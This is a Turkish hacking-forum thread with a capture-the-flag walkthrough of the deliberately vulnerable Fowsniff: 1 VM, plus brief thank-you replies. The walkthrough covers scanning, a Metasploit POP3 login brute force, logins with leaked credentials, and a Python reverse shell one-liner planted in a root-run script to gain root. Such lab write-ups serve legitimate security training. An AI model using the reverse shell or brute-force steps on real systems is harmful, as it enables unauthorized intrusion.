Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm


Fowsniff: 1 Zafiyetli Makine Çözümü [qwx]

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 01-12-2018 14:33   #1
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 407


Fowsniff: 1 Zafiyetli Makine Çözümü [qwx]



Fowsniff : 1 Zafiyetli Makine Çözümü



Fowsniff : 1 İndirme Linki ;

Kod:
https://www.vulnhub.com/entry/fowsniff-1,262/
Makinemizi açtığımız zaman şu şekilde bir görüntü olmaktadır.



Şimdi ilk olarak ağdaki cihazları tarayacağız ve ip adreslerini görüntüleyeceğiz.

Kod:
netdiscover




Zafiyetli makinemizin IP adresini bulduk tarayıcığımzda ip adresine giriş yapıyoruz bizi böyle bir ekran karşılıyor.



Şimdi sırada IP adresindeki açık portları bulmaktır.

Kod:
nmap -sS -sV <adress>




Portlarda bir şey çıkmadığını görüyoruz ardından dirb taraması yapıyoruz.

Kod:
dirb http://<adress>




Evet dirb sonuçlarına baktığımızda buradan bir şey elde edemedik dirb'in bizim işimize yarıyacak siteleri bulamadığı düşünüyorum.
Gobuster taramasını kullanacağım daha ayrıntılı bir sonuç elde etmek için.

Kod:
gobuster -u http://<adress> -x php,html,txt -w <sizin worldlistinizin olduğu konum> -t 200




Gobuster taraması yaptığımızda dirb de çıkmayan /security.txt 'yi elde ediyoruz orayı ziyaret ettiğimizde bizi şu şekilde bir yazı karşılıyor.



Bize gösterilen Fowsniff Corp got pwn3d by B1gN1nj4! yazısını tarayıcıda arattığımızda en aşağıda pastebin sitesi görmekteyiz buraya giriş yaptığımızda bizi şu ekran karşılamaktadır.



Sitede denildiği üzere karışımızda e-mail ve passları bulunmakta bunları kırmamızı istiyor ve passlar MD5 ile şifrelenmiş.Hemen MD5 leri kırmak için bir internet sayfasına giriş yapıyoruz.Yan tarafta kırılmış hallerini görebilirsiniz.



nmap ile yaptığımız port taramasında /110 pop3 portunun açık olduğunu hatırlarsınız şimdi bu id ve passları orada deniyeceğiz.Sayı az olduğu için el yordamı ile de denenebilir fakat pratik için m.e.t.a.sploit framework ile yapmayı öneririm.Öncelikle bize verilen id leri bir txt dosyasının içine koyuyoruz sonra aynı işlemi kırdığımız md5 şifreler için de yapıp msf yi açıyoruz.


Kod:
use auxiliary/scanner/pop3/pop3_login
set RHOSTS <adress>
set user_file <id'lerin tutulduğu txt dosyası>
set pass_file <pass'ların tutulduğu txt dosyası>
run




ID ve Pass ı elde ettik şimdi pop3 e bağlanmak kaldı aşağıdaki kod ile giriş sağlıyoruz ardından içindekileri görmek için listeliyoruz içerisinde 2 adet mesaj bulunmakta ve mesajları göstermesini sağlıyoruz.Kodlar sırası ile aşağıda mevcut.

Kod:
nc <adress> <port>
user seina
pass scoobydoo2
 list
 retr 1 
 retr 2


retr 2 görseli



Mesaj 1 ve mesaj 2 yi incelediğimizde;
Mesaj 1 de : The temporary password for SSH is "S1ck3nBluff+secureshell"

dizisi ile bize protokolün SSH olduğunu söylemektedir.
Mesaj 2 de : Mesajın kimden gönderildiği yazmaktadır.
Bu bilgiler doğrultusunda sıradaki hamlemiz SSH bağlanmak olacaktır.

Kod:
ssh baksteen@<adress>
Sizden şifre isteyecek şifre : S1ck3nBluff+secureshell


Evet şimdi giriş sağladık şimdi içerisi kurcalama vakti geldi.Flag arayışımızda kullanıcı dosyalarını listelememiz lazım.

Kod:
find / -group users -type f 2>/dev/null




Cube mizi bulduk şimdi sıra o dizine gitmekte ve cubeyi göstermekte.Ardından python ve vim i arayacağız.

Kod:
cd /opt/cube
ls -la
cat cube.sh
 whereis python
 whereis vim


Dosyayı vim ile açacağız ve reverse python shell deneyeceğiz.Shell deki python ın yanına 3 rakamını ekliyoruz makinede python3 olduğu için ve CTRL+C :x komutu ile kayıt edip çıkıyoruz hemen yanına da port dinlemeyi açıyoruz.

Kod:
vim cube.sh

python3 -c 'import
 socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);   os.dup2(s.fileno(),1);   os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

nc -lvp 4444



Dinlenme sonuçları geldi ve hemen kim olduğumuzu soruyoruz.root ile giriş yapıyoruz sadece dosyaları listeleyip flagı bulmak kaldı.




Ve flag.txt gözüktü.






Fownshiff 1 Zafiyetli Makine çözümünün sonuna geldik.Esenlikle kalın.



___________________________________________

A hacker does for love what others would not do for money.

Konu Qwx tarafından (01-12-2018 17:47 Saat 17:47 ) değiştirilmiştir.. Sebep: Logo eklemem istendi.
 Offline  
 
Alıntı ile Cevapla
Alt 01-12-2018 15:11   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2016
Nereden
-
Mesajlar
Konular

Teşekkür (Etti): 197
Teşekkür (Aldı): 59




elinize sağlık



___________________________________________

"İstikbal Göklerdedir"
"Yüksel TÜRK ! Senin İçin Yüksekliğin Hududu Yoktur"
Gazi Mustafa Kemal Atatürk
𐱅𐰇𐰼𐰜
Phantom Phorever
 Offline  
 
Alıntı ile Cevapla
Alt 01-12-2018 15:32   #3
  • Binbaşı
  • Üye Bilgileri
Üyelik tarihi
08/2017
Nereden
Nereye...
Mesajlar
Konular

Teşekkür (Etti): 62
Teşekkür (Aldı): 165




Teşekkürler yararlı bir paylaşım



___________________________________________

Alma mazlumun ahını, çıkar aheste aheste

 Offline  
 
Alıntı ile Cevapla
Alt 01-12-2018 16:00   #4
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
07/2017
Nereden
røøt@:~#
Mesajlar
Konular

Teşekkür (Etti): 1248
Teşekkür (Aldı): 215




Ellerine sağlık, resimler sana aitse tht ibaresi ekle.



___________________________________________

Elbet bir gün.
 Offline  
 
Alıntı ile Cevapla
Alt 01-12-2018 16:52   #5
  • Siber Güvenlik Ekibi
  • Üye Bilgileri
Üyelik tarihi
04/2012
Nereden
İzmir
Mesajlar
Konular

Teşekkür (Etti): 75
Teşekkür (Aldı): 407




Alıntı:
'Rairsa´isimli üyeden Alıntı Mesajı göster
elinize sağlık
Alıntı:
spravci´isimli üyeden Alıntı Mesajı göster
Teşekkürler yararlı bir paylaşım
Alıntı:
TheFlashTR´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık, resimler sana aitse tht ibaresi ekle.

Sağolun teşekkürler.
Evet resimlerde dahil olmak üzere hepsi bana aittir en kısa zamanda logo ekleme işlemini de gerçekleştireceğim.



___________________________________________

A hacker does for love what others would not do for money.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau